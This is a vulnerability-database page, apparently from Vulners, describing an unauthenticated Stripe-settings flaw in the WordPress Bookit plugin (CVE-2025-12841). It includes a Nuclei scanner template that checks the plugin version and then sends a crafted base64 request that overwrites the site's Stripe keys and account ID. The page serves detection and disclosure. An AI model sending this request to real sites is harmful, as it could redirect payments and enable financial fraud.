Lucene search
K

WordPress Bookit < 2.5.1 - Unauthenticated Stripe Settings Update

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

WordPress Bookit plugin below 2.5.1 allows unauthenticated Stripe settings updates via public REST endpoint.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-12841
12 Dec 202511:13
circl
CNNVD
WordPress plugin Bookit 安全漏洞
12 Dec 202500:00
cnnvd
CVE
CVE-2025-12841
12 Dec 202510:17
cve
Cvelist
CVE-2025-12841 Bookit < 2.5.1 – Unauthenticated Settings Update
12 Dec 202510:17
cvelist
EUVD
EUVD-2025-203065
12 Dec 202510:17
euvd
NVD
CVE-2025-12841
12 Dec 202511:15
nvd
Patchstack
WordPress Bookit plugin < 2.5.1 - Unauthenticated Settings Update vulnerability
31 Dec 202500:00
patchstack
Positive Technologies
PT-2025-50919
12 Dec 202500:00
ptsecurity
RedhatCVE
CVE-2025-12841
13 Dec 202511:06
redhatcve
Vulnrichment
CVE-2025-12841 Bookit < 2.5.1 – Unauthenticated Settings Update
12 Dec 202510:17
vulnrichment
Rows per page
id: CVE-2025-12841

info:
  name: WordPress Bookit < 2.5.1 - Unauthenticated Stripe Settings Update
  author: 0x_Akoko
  severity: high
  description: |
    Bookit WordPress plugin < 2.5.1 contains a broken access control vulnerability caused by a publicly accessible REST endpoint allowing unauthenticated update of Stripe payment options, letting remote attackers modify payment settings without authentication.
  impact: |
   Remote attackers can modify Stripe payment options without authentication, potentially leading to financial fraud or service disruption.
  remediation: |
   Upgrade to version 2.5.1 or later.
  reference:
    - https://wpscan.com/vulnerability/60cb3d5f-1aa5-4858-ab84-07fe7c023fdd/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-12841
    - https://wordpress.org/plugins/bookit/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L
    cvss-score: 8.2
    cve-id: CVE-2025-12841
    epss-score: 0.00654
    epss-percentile: 0.46857
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/bookit/"
  tags: cve,cve2025,wp,wp-plugin,wordpress,bookit,stripe,unauth,intrusive

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/bookit/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(to_lower(body), "bookit")'
          - 'compare_versions(version, "< 2.5.1")'
        internal: true
        condition: and

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(?i)Stable tag:\s*([\w.]+)'
        internal: true

  - raw:
      - |
        GET /wp-json/bookit/v1/commerce/stripe/return?stripe=eyJzdHJpcGVfdXNlcl9pZCI6IkFDQ1RfSEFDS0VSIiwibGl2ZSI6eyJhY2Nlc3NfdG9rZW4iOiJza19saXZlX2hhY2tlciJ9LCJzYW5kYm94Ijp7ImFjY2Vzc190b2tlbiI6InNrX3Rlc3RfaGFja2VyIn0sImNsaWVudF9pZCI6ImNhX2hhY2tlciIsInB1Ymxpc2hhYmxlX2tleSI6InBrX2xpdmVfaGFja2VyIiwiY2xpZW50X3NlY3JldCI6InNrX2xpdmVfaGFja2VyIn0= HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains_all(to_lower(header), "bookit-settings", "x-redirect-by")'
        condition: and
# digest: 4a0a0047304502202498a99d607d6453b1972e6d1db5d5aaea59ee504f98b4de9bb6d1bb04b890b5022100e233633623e244c339fcfc9a30953aad8b7002c614ace8c33ec142284be9a747:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 May 2026 02:52Current
6Medium risk
Vulners AI Score6
CVSS 3.15.3
EPSS0.00654
SSVC
14